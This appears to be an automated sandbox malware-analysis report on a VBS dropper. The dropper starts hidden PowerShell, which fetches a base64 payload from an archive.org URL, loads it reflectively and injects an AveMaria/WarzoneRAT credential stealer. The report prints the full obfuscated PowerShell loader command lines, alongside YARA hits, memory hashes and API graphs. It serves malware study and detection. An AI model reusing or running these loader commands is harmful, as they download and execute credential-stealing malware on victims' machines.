                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 63 31 63 77 46 32 51 32 56 47 52 30 56 32 52 75 6c 55 5a 32 46 32 64 75 51 57 62 74 35 57 61 33 42 77 56 7a 42 58 59 44 5a 58 5a 45 52 58 5a 48 35 57 53 6c 5a 58 59 33 42 51 51 7a 42 58 59 44 5a 58 5a 45 52 58 5a 48 35 57 53 6c 5a 58 59 33 35 43 5a 74 31 6d 62 70 64 48 41 42 4e 48 63 68 4e 6b 64 6c 52 45 64 6c 64 6b 62 4a 56 6d 64 68 64 48 41 6c 4e 33 62 73 4e 6b 62 4a 56 6d 64 68 64 6e 4c 6b 31 57 62 75 6c 32 64 41 55 32 63 76 78 32 51 75 6c 55 5a 32 46 32 64 41 49 58 5a 6d 5a 57 64 43 52 47 5a 42 35 57 53 6c 5a 58 59 33 35 43 5a 74 31 6d 62 70 64 48 41 79 56 6d 5a 6d 56 6e 51 6b 52 57 51 75 6c 55 5a 32 46 32 64 41 51 6e 62 6c 5a 58 52 30 56 32 55 6c 31 57 61 30 35 43 5a 74 31 6d 62 70 64 48 41 30 35 57 5a 32 56 45 64 6c 4e 56 5a 74 6c 47 64 41 51 6e 62
                                                                                    Data Ascii: c1cwF2Q2VGR0V2RulUZ2F2duQWbt5Wa3BwVzBXYDZXZERXZH5WSlZXY3BQQzBXYDZXZERXZH5WSlZXY35CZt1mbpdHABNHchNkdlREdldkbJVmdhdHAlN3bsNkbJVmdhdnLk1Wbul2dAU2cvx2QulUZ2F2dAIXZmZWdCRGZB5WSlZXY35CZt1mbpdHAyVmZmVnQkRWQulUZ2F2dAQnblZXR0V2Ul1Wa05CZt1mbpdHA05WZ2VEdlNVZtlGdAQnb


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:23:23:07
                                                                                    Start date:01/10/2024
                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs"
                                                                                    Imagebase:0x7ff7d2820000
                                                                                    File size:170'496 bytes
                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:23:23:08
                                                                                    Start date:01/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                    Imagebase:0x7ff7b2bb0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:23:23:08
                                                                                    Start date:01/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:4
                                                                                    Start time:23:23:09
                                                                                    Start date:01/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"
                                                                                    Imagebase:0x7ff7b2bb0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1443666553.000001B2BB240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1415526929.000001B2B3123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:23:23:15
                                                                                    Start date:01/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                    Imagebase:0xfc0000
                                                                                    File size:43'008 bytes
                                                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                    • Rule: AveMaria_WarZone, Description: unknown, Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Reset < >
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1474503220.00007FF7BFEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff7bfec0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: 26e46203e0fbedb6c576fc2209afd7e61aa18e804de0bdbd9a0a948ec839d7a5
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: C001A77010CB0C4FD744EF0CE051AB6B3E0FB95364F10052EE58AC3651D636E882CB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db985cd5bf6832d8204cd4bc18eaf5a705b28739a322cccc1839f8c524e7c9ca
                                                                                      • Instruction ID: 9d734e9b1ef7172625110a5dcc629312d45f833fe1bdf7a85135c620f041f824
                                                                                      • Opcode Fuzzy Hash: db985cd5bf6832d8204cd4bc18eaf5a705b28739a322cccc1839f8c524e7c9ca
                                                                                      • Instruction Fuzzy Hash: 72711571A0D6C69FD7079B7898612E5BB30EF53358F4902F7C088CB1A3DA38661AC791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1447477215.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bffb0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ecff9ee79983e26740bcadf6745abe4a7c2f0db0597c57485ef22ec357d838c
                                                                                      • Instruction ID: 1ac168097331131995ddbdae6da2995f8f2cda9d1d55232d139f8ecdd2b1d9f6
                                                                                      • Opcode Fuzzy Hash: 2ecff9ee79983e26740bcadf6745abe4a7c2f0db0597c57485ef22ec357d838c
                                                                                      • Instruction Fuzzy Hash: 2F226621E0DACA4FE796AB6C48942B4BBE1EF67721F8801FAE05DC71D7DD189C058361
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cdff8a3fe64095340f1d4a73c15bc6616ce25a921fd668cfbbf0d3aa9bd3e67f
                                                                                      • Instruction ID: e2ce940d813259fa1d3d193957dceda6afed95508876e440fc99983ca3182121
                                                                                      • Opcode Fuzzy Hash: cdff8a3fe64095340f1d4a73c15bc6616ce25a921fd668cfbbf0d3aa9bd3e67f
                                                                                      • Instruction Fuzzy Hash: F7D13230A18A498FDB88EF5CD455AEDB7E1FFA8710F544269E40DD7299CA34E881CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14d32f08a12b662c6fa7bafc582ab1a4558ade75d993b64a2ce2fa829aefde7f
                                                                                      • Instruction ID: ebe76efece8782997a825a20a5c1efca05a7f91b83a3e2d6d72f16eadd2b9cb9
                                                                                      • Opcode Fuzzy Hash: 14d32f08a12b662c6fa7bafc582ab1a4558ade75d993b64a2ce2fa829aefde7f
                                                                                      • Instruction Fuzzy Hash: BCB13B70908A5D8FDB98EF68D8547ECB7B1FF69311F5042AAD00DE3696CB34A985CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1447477215.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bffb0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d356ec8c1345392f72caa37a9fb5ca50d4e10e671c5bfcce1e90cb1b60c53a22
                                                                                      • Instruction ID: 58debbbd2583c89a4bdc70bd66d945093704f5b1576747d2d9f56b220aff1168
                                                                                      • Opcode Fuzzy Hash: d356ec8c1345392f72caa37a9fb5ca50d4e10e671c5bfcce1e90cb1b60c53a22
                                                                                      • Instruction Fuzzy Hash: 78613B22E0DEC74FE7A5AAAC14512F8F2D1EF66B72B8801BEE51DC71D7DD1898044361
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1447477215.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bffb0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8c7aa69343846c30478b431234c085bd4d9f2a8fd30f18dbaaba7eba2bd7028
                                                                                      • Instruction ID: c1cdbbb9b9d42f71912192eb63b904bd99d55ebdde7938c0014399a891cd7bdb
                                                                                      • Opcode Fuzzy Hash: a8c7aa69343846c30478b431234c085bd4d9f2a8fd30f18dbaaba7eba2bd7028
                                                                                      • Instruction Fuzzy Hash: F2512721E0CBCA4FE791AB6C44A52B4BBE1EF66711F8801FAE50DC719BDD28DC058361
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1447477215.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bffb0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6600fad4e7d5c0659130eb3fc1a1b599cac0a1ee60df29dabfc391fb619f8b4
                                                                                      • Instruction ID: c2b665881ca1efc6399f72654261212ffae2b47f6da07a91ff41cdaa2ed104f6
                                                                                      • Opcode Fuzzy Hash: a6600fad4e7d5c0659130eb3fc1a1b599cac0a1ee60df29dabfc391fb619f8b4
                                                                                      • Instruction Fuzzy Hash: 77410922E0EEC74FE7A5A6AC04512F8E2D1EF66B72BD801BDE52DC71D7DD1898044321
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5de04ed3ed21529096170d859ecb83f4bcba8f62ace6e17fbccf82dbeab56a8
                                                                                      • Instruction ID: 261396f4d5ba452099e3e24491f25f7dc7252550b459484755c91bfdb21e1f34
                                                                                      • Opcode Fuzzy Hash: d5de04ed3ed21529096170d859ecb83f4bcba8f62ace6e17fbccf82dbeab56a8
                                                                                      • Instruction Fuzzy Hash: 7701B131B1CB048FD7689E5CE482575B3E1EBD9720F10463EE08AC3296EE26E8428646
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07d101c740cf37a515efd06493a5613819389bae709fa9f1c1a1a4764a895255
                                                                                      • Instruction ID: 461f865639b117df0267e001dd3297105f294310287c93642f64da09faa0604e
                                                                                      • Opcode Fuzzy Hash: 07d101c740cf37a515efd06493a5613819389bae709fa9f1c1a1a4764a895255
                                                                                      • Instruction Fuzzy Hash: 6701A73010CB0C8FD784EF0CE051AB6B3E0FB95364F10062EE58AC3651D636E882CB42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0450d366c0aec0564b0ed5945e1e5470b5b0d67aa92b4d3b26c11cbedd1ff180
                                                                                      • Instruction ID: d819120e4fd370f16538c8d018db8f57f1b63f92783a1618515d000f10c28675
                                                                                      • Opcode Fuzzy Hash: 0450d366c0aec0564b0ed5945e1e5470b5b0d67aa92b4d3b26c11cbedd1ff180
                                                                                      • Instruction Fuzzy Hash: D8F0627271C7044FD71CDA0CF882569B3E1EBC9334F10462EE4CAC3296DA26E843C686
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac54cab801f632b051c1a6736e2062ea103057594eabaf17264480c7c7abb5af
                                                                                      • Instruction ID: 11202216abce8b675d11ba8a853e8b9ebfcdd09a7e40b355d8e37d9c01d240f5
                                                                                      • Opcode Fuzzy Hash: ac54cab801f632b051c1a6736e2062ea103057594eabaf17264480c7c7abb5af
                                                                                      • Instruction Fuzzy Hash: EDE0123190994D9FDF81EF58C4416E97BB1FF65300F5001B5E55CC7146CA38E591CB40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5M_^
                                                                                      • API String ID: 0-788788340
                                                                                      • Opcode ID: 3e550ed5173abbf4041962d6a5883600c23444d3f52c818c6ab0620dbf6632ca
                                                                                      • Instruction ID: e50cba9336b1d67f0ece524536cce6a0b95e27e7ba3f34f3a70232737a448466
                                                                                      • Opcode Fuzzy Hash: 3e550ed5173abbf4041962d6a5883600c23444d3f52c818c6ab0620dbf6632ca
                                                                                      • Instruction Fuzzy Hash: A981C26390DBD69FD7535B2CB8A80E87FA0DE636A474A42F7C5804F193ED18184BC762
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1447477215.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bffb0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1751f9c843f566fa4459afac1406c28d3badf46ec0c541e49cadaf4ce1342767
                                                                                      • Instruction ID: ad5ca721a8f8653bf3948332087d2cc120f1cf8c5ec9186655f60074b3cd9cf1
                                                                                      • Opcode Fuzzy Hash: 1751f9c843f566fa4459afac1406c28d3badf46ec0c541e49cadaf4ce1342767
                                                                                      • Instruction Fuzzy Hash: 22725631A0DBC94FE356AB6C98502B4BBE1EF57621B4801FBE05DC7197DE28AC06C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ea240af8a8b9f8483e76cd06c2a1ff9074fcf41c82d3e05383758b0d14d97b52
                                                                                      • Instruction ID: 78def0405b0e398e318c79d80e2ce8bcb3de571ea929d5bf85d979b1294255d5
                                                                                      • Opcode Fuzzy Hash: ea240af8a8b9f8483e76cd06c2a1ff9074fcf41c82d3e05383758b0d14d97b52
                                                                                      • Instruction Fuzzy Hash: 6D221870D0865D8BDB18DF98C4A19EDFBB2FF88314F54826DD41AAB34ACA346885CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1446979753.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7bfee0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7faffcbaf4994f95edcc27fd0c79872c6e0442d3666c2fcc2c277f1ad345017
                                                                                      • Instruction ID: 500ff4be34a708b8f846db40f5ebe1d63b9e73290e75c9f152ad515724362371
                                                                                      • Opcode Fuzzy Hash: e7faffcbaf4994f95edcc27fd0c79872c6e0442d3666c2fcc2c277f1ad345017
                                                                                      • Instruction Fuzzy Hash: 2751226284E7C24FD7039B745C616A47FB0AF13224B4E06EBC4D0CF0E3E6595A5AD322

                                                                                      Execution Graph

                                                                                      Execution Coverage:4.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:3.1%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:134
                                                                                      execution_graph 67058 6cc620e6 67059 6cc620fc 67058->67059 67060 6cc62111 sqlite3_mutex_enter 67059->67060 67061 6cc62122 67060->67061 67062 6cc6213e sqlite3_prepare_v2 67061->67062 67063 6cc622f3 67061->67063 67062->67063 67064 6cc62327 sqlite3_errmsg 67063->67064 67065 6cc62359 sqlite3_mutex_leave 67063->67065 67066 6cc62335 67063->67066 67064->67066 67066->67065 67067 6cc68cc5 67072 6ccb89f1 67067->67072 67069 6cc68d0f 67070 6cc68ce6 sqlite3_mutex_enter sqlite3_free sqlite3_mutex_leave 67070->67069 67071 6cc68cca 67071->67069 67071->67070 67073 6ccb89fa 67072->67073 67074 6ccb89fd 67072->67074 67073->67071 67075 6ccb8bcf 67074->67075 67076 6ccb8a28 sqlite3_mutex_enter 67074->67076 67075->67071 67077 6ccb8a3f 67076->67077 67078 6ccb8a70 sqlite3_mutex_leave 67077->67078 67078->67075 67079 6ccb8a7f sqlite3_mutex_enter 67078->67079 67080 6ccb8a97 67079->67080 67081 6ccb8b94 sqlite3_mutex_leave sqlite3_mutex_enter 67079->67081 67080->67081 67084 6ccb8aa3 memset 67080->67084 67082 6ccb8bc8 sqlite3_mutex_leave 67081->67082 67083 6ccb8bb6 sqlite3_mutex_free 67081->67083 67082->67075 67083->67082 67085 6ccb8ac6 67084->67085 67086 6ccb8b14 sqlite3_malloc 67085->67086 67087 6ccb8af2 sqlite3_config 67085->67087 67088 6ccb8b05 67085->67088 67089 6ccb8b58 sqlite3_free 67086->67089 67091 6ccb8b2a 67086->67091 67087->67088 67088->67086 67088->67091 67092 6ccb8bd5 GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 67089->67092 67091->67081 67092->67091 67093 6cd1d4f9 _NSSUTIL_GetSecmodName 67094 